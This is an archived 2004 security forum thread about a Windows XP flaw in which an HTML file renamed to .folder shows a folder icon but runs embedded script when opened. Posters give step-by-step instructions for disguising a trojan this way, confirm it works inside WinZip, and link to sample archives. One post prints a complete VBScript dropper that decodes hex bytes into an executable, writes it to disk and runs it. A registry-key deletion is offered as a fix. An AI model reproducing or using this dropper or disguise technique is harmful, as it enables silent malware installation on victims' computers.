Xp Exploit About Folder And Html

Full Version: Xp Exploit About Folder And Html

GovernmentSecurity.org > The Archives > Exploit Articles

zero-maitimax

Jan 26 2004, 01:01 PM

ppl new exploit in xp

if you change a html file in .folder . xp will change the icoon als a map.

but

if you dubbel click on it it open as a html. you can put in a html jave script that excute an exe file..

the exploit is ver high becaurs program's like winzip see it as a folder

some jave script
http://www.malware.com/exe-cute-html.zip

boshcash

Jan 26 2004, 02:08 PM

i dont understand what u r saying but i think these are oldies ..

usanet21

Jan 26 2004, 02:14 PM

yeah man..agrees...i cant understand wat he is sayin,
zero-maitimax, can u pls tell me step by step how to change a html file and write a javascript to execute an exe file. sorry, i really dont understand

zero-maitimax

Jan 26 2004, 02:19 PM

oke

wel you justed make a html file with jave script in it.. and in the jave script you put a exe file (trojan)

now you change the .html to .folder

now the icoon change in to a folder icoon..

but if you dubbel klik on the folder it open de orignaal html file..

and excute the exe(trojan)

if you pack this folder in winzip you still see a folder icoon even in winzip .. but again if you dubbel klik on it will excute the origanaal html file

sysadmin

Jan 26 2004, 02:26 PM

Hallo zero-maitimax,

i tried it out with WINZIP 8.0 and it works like you said!!

Winzip works with that file like a "folder" and excute it, just within a trojan.

Bye, sysadmin

zero-maitimax

Jan 26 2004, 02:28 PM

tnx you have traid it

i'm good

EXPLOiTED

Jan 26 2004, 02:29 PM

ok that makes sense. but when what exe are u gonna exec?...i hope OS's dont come with premade trojans on them. Would that mean you have to get the trojan u wanna exec on their system as well?

sysadmin

Jan 26 2004, 02:40 PM

QUOTE (zero-maitimax @ Jan 26 2004, 02:28 PM)

tnx you have traid it

i'm good

Hey zero-maitimax,

you are so goooood ! ! !

Bey, sysadmin

zero-maitimax

Jan 26 2004, 02:50 PM

some more info
http://lists.netsys.com/pipermail/full-dis...-January/016115. html

example (TrojanDropper.JS.Mimail.

http://www.malware.com/my.pics.zip

sysadmin

Jan 26 2004, 02:59 PM

QUOTE (zero-maitimax @ Jan 26 2004, 02:50 PM)

some more info
http://lists.netsys.com/pipermail/full-dis...-January/016115. html

Hello zero-maitimax,

this link does not match.

Bye, sysadmin

larsbruggie

Jan 26 2004, 03:13 PM

I was so n00b that I opened illmob's my picture.folder , now I am infected

sysadmin

Jan 26 2004, 03:17 PM

Hallo larsbruggiem,

Next time it´s better to "read" the posts.

Bye, sysadmin

zero-maitimax

Jan 26 2004, 03:23 PM

http://lists.netsys.com/pipermail/full-dis...ary/016115.html

larsbruggie i'm sorry for yeah..

i found more stuff

.dvd
.audiocd
.mapimail
.mydocs

solution i found is HKEY_CLASSES_ROOT/.folder delete it.. ( don't know if it is wrong but the exploit doesn't excist no more at my machiene)

hdlgp

Jan 26 2004, 06:14 PM

I prove this exploit and works,

T3cHn0b0y

Jan 26 2004, 07:25 PM

It does indeed! Im deleting that regkey right now! Thnx 4 the info m8!

boshcash

Jan 26 2004, 08:57 PM

ok it works fine ,but what are the extra priviledges that i gain when user runs html file locally ? its like sending an html link if no extra priviledges are found

note : for ppl to work this exploit the html file must contain <html> tag else it wont work

m0t0ro

Jan 26 2004, 09:50 PM

Can anyone tell me what's the effect of executing the 'My pics.folder' script?

Thanks.

m0t0ro

Jan 26 2004, 09:53 PM

what I mean is what is the malware.exe file?

Yorn

Jan 27 2004, 03:12 PM

CODE

<title>malware.com</title>

<script language=vbs>

self.MoveTo 6000,6000

t=& #34;4D,5A,44,01,05,00,02,00,20,00,21,00,FF,FF,75,00,00,02,00,00,99,00,00,00,3E,0
0,00,00,01,00,FB,30,6A,72,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00"
t=t&& #34;,00,79,00,00,00,9E,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
,00,00,00,00,00,00,00,00"
t=t&& #34;,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
,00,00,00,00,00,00,00,00"
t=t&& #34;,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
,00,00,00,00,00,00,00,00"
t=t&& #34;,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
,00,00,00,00,00,00,00,00"
t=t&& #34;,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
,00,00,00,00,00,00,00,00"
t=t&& #34;,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
,00,00,00,00,00,00,00,00"
t=t&& #34;,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
,00,00,00,00,00,00,00,00"
t=t&& #34;,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,66,33,C0,33,FF
,8C,D3,83,C3,20,B9,70,3F"
t=t&& #34;,8E,C3,F3,66,AB,8C,C0,8E,D8,B8,00,A0,8E,C0,C3,66,B9,00,FA,00,00,66,BF,00,00,
00,00,66,BE,81,02,00,00,66,33,C0,67,8A,9F,40,01,00,00,03,D8,C1,E3,04,2B,D8,2B,D8
,66,C1,C8,10,03,D8,AC,03"
t=t&& #34;,D8,C1,EB,05,67,88,1F,47,E2,DE,C3,B9,80,3E,33,FF,33,F6,F3,66,A5,C3,1E,06,8C,
D8,05,A0,0F,8E,C0,B8,0F,00,8E,D8,33,C0,67,8A,03,8B,F0,BF,0A,00,B9,2C,01,F3,A4,8B
,F0,83,C7,14,B9,2C,01,F3"
t=t&& #34;,A4,07,1F,C3,B0,13,CD,10,BA,0F,00,8E,DA,BE,48,03,BA,C8,03,32,C0,EE,42,B9,00,
03,F3,6E,E8,5C,FF,66,33,DB,E8,B5,FF,53,E8,6E,FF,BA,DA,03,EC,A8,08,75,FB,EC,A8,08
,74,FB,E8,96,FF,5B,FE,C3"
t=t&& #34;,B4,01,CD,16,74,E0,B8,03,00,CD,10,B8,00,4C,CD,21,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,B1,C0,90,1D,7B,88,D9,26,6B,C2,C1,88,B8,C9,A4,3A,8B,7F,93,8E,5C
,30,DB,1F,3A,7F,8D,57,33"
t=t&& #34;,C1,8C,B1,77,98,89,DA,6B,D7,5C,86,7C,AB,A8,8E,22,D0,D9,A0,5E,85,D9,2E,A2,C3,
6C,63,6C,45,24,BF,21,97,8E,D0,8A,1A,BF,C0,9B,16,26,B2,9D,D7,8A,2D,B3,8C,24,49,A5
,8D,29,9F,2D,87,5C,C6,C7"
t=t&& #34;,5A,38,97,96,2D,2A,15,CD,A5,73,CC,AE,A6,5D,75,A4,22,B3,9F,8C,D7,77,26,A7,56,
B0,B8,64,84,1B,5A,D9,1D,CE,AF,36,3B,98,7C,C3,38,4C,C0,1A,22,1E,CF,46,79,62,62,1D
,78,D7,CF,6D,DA,7F,6C,A2"
t=t&& #34;,25,97,C8,4B,C2,C8,33,70,A5,29,1C,19,BB,A9,69,18,A3,34,9F,51,63,33,1B,3A,7D,
57,81,BD,20,A9,D5,23,19,55,4C,55,AA,62,19,A1,89,23,2B,6B,30,72,92,39,52,94,A8,35
,6E,57,CA,CC,C8,CB,9B,C1"
t=t&& #34;,71,46,6B,61,6B,2A,7E,71,C7,49,AD,3A,4F,AB,C1,5F,15,67,A7,C4,3C,87,90,59,8A,
D7,64,C8,21,BE,1B,6C,90,B0,D8,73,91,50,75,41,3C,4C,56,D6,3F,A2,2C,1C,B9,65,D8,76
,C6,38,B5,51,B9,33,B4,48"
t=t&& #34;,64,84,56,A8,A0,AE,1D,9C,C2,1B,83,93,DB,59,54,22,75,70,AF,9E,19,7E,78,34,7D,
5D,AA,A1,5E,55,46,BB,BE,14,C5,1A,45,5E,14,3B,C5,7B,6D,BB,40,81,AD,7A,D2,4A,8E,3D
,B4,D6,5C,A9,C6,26,C7,98"
t=t&& #34;,58,C6,7D,BB,15,BE,78,CF,C5,74,7C,75,AA,2B,77,25,C1,5F,A7,23,C1,8A,CF,D7,49,
55,54,9B,84,8A,55,5D,35,1F,71,25,92,79,D5,CF,82,2E,23,5D,8B,35,8A,4E,76,1C,C6,7E
,26,19,AF,A7,32,38,CE,49"
t=t&& #34;,2C,2C,D0,14,67,39,2D,29,83,33,82,CE,AD,CF,CD,28,1A,1E,38,B0,CE,41,2E,7B,48,
4C,2B,D2,92,BD,CB,97,24,B8,39,C2,9C,5A,D9,D3,63,17,D7,71,18,30,30,96,67,1C,9E,50
,45,58,30,8B,C4,7F,85,9A"
t=t&& #34;,4C,C9,58,B3,1F,D3,53,20,24,C9,D6,D0,A8,5A,A1,48,92,7B,D3,70,B2,72,2A,CF,B5,
8F,C1,63,2D,1F,6E,1C,B6,B2,C0,2E,B6,26,19,B5,20,B9,5C,14,3D,C9,2A,51,20,7A,3B,B3
,2B,CE,B8,3F,90,A8,2F,CF"
t=t&& #34;,4E,CF,68,28,1B,14,BF,6F,A2,1C,85,88,D0,AA,5E,18,B7,1A,1E,C6,7F,D9,94,6D,AC,
B5,4C,59,B0,6E,C0,4D,3D,A4,C0,5A,90,65,38,53,38,61,81,CA,A4,3C,96,28,49,78,86,54
,2F,63,2E,42,66,57,28,2B"
t=t&& #34;,95,BF,58,5E,51,95,5E,A2,3D,71,C9,A8,CD,AE,C1,54,D4,BC,2A,9C,76,9E,43,9E,84,
92,AB,A4,3B,1B,BF,B9,75,65,5E,B3,3C,8C,94,41,B5,93,B8,59,DB,C2,87,D5,76,60,61,3B
,47,A9,15,7E,96,A2,38,60"
t=t&& #34;,62,80,9B,2A,5E,CB,A7,6F,47,83,36,82,8F,72,18,37,8F,20,4E,D8,9E,B1,9B,85,3E,
A3,70,5F,8A,54,5B,2D,C6,A8,A7,68,8D,94,1E,44,A4,16,83,BC,99,58,3E,C5,9E,15,4F,9C
,78,3A,6A,7F,2A,32,9F,48"
t=t&& #34;,30,47,59,6D,3D,AA,48,7D,AE,AF,DB,72,A8,D9,D1,2A,98,B5,49,BC,36,6B,17,45,D2,
3E,DB,37,B1,67,80,A0,99,9D,93,89,93,90,88,90,47,58,65,5A,C4,C8,80,2E,80,A0,8F,77
,9A,5E,4F,D3,B3,92,3A,81"
t=t&& #34;,1B,4D,CD,2B,D8,A1,5B,9F,63,3E,D6,A7,17,55,7C,73,C9,90,C5,33,85,82,B2,39,78,
64,C1,3C,C2,77,80,4D,21,37,96,29,69,4A,C6,4A,53,C2,65,94,68,54,8C,A7,68,74,40,79
,C7,51,51,63,8E,8D,8D,92"
t=t&& #34;,5B,37,30,72,72,47,A2,8E,B1,84,51,1D,A2,4B,26,53,58,7C,5C,B1,3A,97,AC,56,B7,
C4,42,BC,3F,65,82,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
,00,00,00,00,00,00,00,00"
t=t&& #34;,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
,00,00,00,00,00,00,00,00"
t=t&& #34;,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
,00,00,00,00,00,00,00,00"
t=t&& #34;,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
,00,00,00,00,00,00,00,00"
t=t&& #34;,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
00,00,00,00,00,00,0F,00,00,10,00,00,11,00,00,12,00,00,13,00,00,14,00,00,15,00,00
,16,00,00,17,00,00,18,00"
t=t&& #34;,00,19,00,00,1A,00,00,1B,00,00,1C,00,00,1D,00,00,1E,00,00,1F,00,00,20,00,00,
21,00,00,22,00,00,23,00,00,24,00,00,25,00,00,26,00,00,27,00,00,28,00,00,29,00,00
,2A,00,00,2B,00,00,2C,00"
t=t&& #34;,00,2D,00,00,2E,00,00,2F,00,00,30,00,00,31,00,00,32,00,00,33,00,00,34,00,00,
35,00,00,36,00,00,37,00,00,38,00,00,39,00,00,3A,00,00,3B,00,00,3C,00,00,3D,00,00
,3E,00,00,3F,00,00,3F,00"
t=t&& #34;,00,3F,00,00,3F,01,00,3F,02,00,3F,03,00,3F,04,00,3F,05,00,3F,06,00,3F,07,00,
3F,08,00,3F,09,00,3F,0A,00,3F,0B,00,3F,0C,00,3F,0D,00,3F,0E,00,3F,0F,00,3F,10,00
,3F,11,00,3F,12,00,3F,13"
t=t&& #34;,00,3F,14,00,3F,15,00,3F,16,00,3F,17,00,3F,18,00,3F,19,00,3F,1A,00,3F,1B,00,
3F,1C,00,3F,1D,00,3F,1E,00,3F,1F,00,3F,20,00,3F,21,00,3F,22,00,3F,23,00,3F,24,00
,3F,25,00,3F,26,00,3F,27"
t=t&& #34;,00,3F,28,00,3F,29,00,3F,2A,00,3F,2B,00,3F,2C,00,3F,2D,00,3F,2E,00,3F,2F,00,
3F,30,00,3F,31,00,3F,32,00,3F,33,00,3F,34,00,3F,35,00,3F,36,00,3F,37,00,3F,38,00
,3F,39,00,3F,3A,00,3F,3B"
t=t&& #34;,00,3F,3C,00,3F,3D,00,3F,3E,00,3F,3F,00,3F,3F,00,3F,3F,00,3F,3F,01,3F,3F,02,
3F,3F,03,3F,3F,04,3F,3F,05,3F,3F,06,3F,3F,07,3F,3F,08,3F,3F,09,3F,3F,0A,3F,3F,0B
,3F,3F,0C,3F,3F,0D,3F,3F"
t=t&& #34;,0E,3F,3F,0F,3F,3F,10,3F,3F,11,3F,3F,12,3F,3F,13,3F,3F,14,3F,3F,15,3F,3F,16,
3F,3F,17,3F,3F,18,3F,3F,19,3F,3F,1A,3F,3F,1B,3F,3F,1C,3F,3F,1D,3F,3F,1E,3F,3F,1F
,3F,3F,20,3F,3F,21,3F,3F"
t=t&& #34;,22,3F,3F,23,3F,3F,24,3F,3F,25,3F,3F,26,3F,3F,27,3F,3F,28,3F,3F,29,3F,3F,2A,
3F,3F,2B,3F,3F,2C,3F,3F,2D,3F,3F,2E,3F,3F,2F,3F,3F,30,3F,3F,31,3F,3F,32,3F,3F,33
,3F,3F,34,3F,3F,35,3F,3F"
t=t&& #34;,36,3F,3F,37,3F,3F,38,3F,3F,39,3F,3F,3A,3F,3F,3B,3F,3F,3C,3F,3F,3D,3F,3F,3E,
3F,3F,3F,3F,3F,3F"

tmp = Split(t, ",")
Set fso = CreateObject("Scripting.FileSystemObject")
Set shell = CreateObject("WScript.Shell")
poop = "fDfdfsdsfsdfssd3s343.exe"
Set f = fso.CreateTextFile(poop, ForWriting)
For i = 0 To UBound(tmp)
l = Len(tmp(i))
b = Int("&H" & Left(tmp(i), 2))
If l > 2 Then
r = Int("&H" & Mid(tmp(i), 3, l))
For j = 1 To r
f.Write Chr(b)
Next
Else
f.Write Chr(b)
End If
Next
f.Close
runscr=1
if runscr then shell.run(poop)
on error resume next: self.close()
</script>

chris105

Jan 27 2004, 08:03 PM

QUOTE (zero-maitimax @ Jan 26 2004, 02:19 PM)

Right a "dubbel klik" "origanal" talk straight

m0t0ro

Jan 31 2004, 10:01 PM

can anybody explain how to execute some other hexadecimal code of some binary file?

Thanks!

aiboforcen

Feb 1 2004, 01:19 PM

Does anyone know what extention a folder in win2k have ?

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.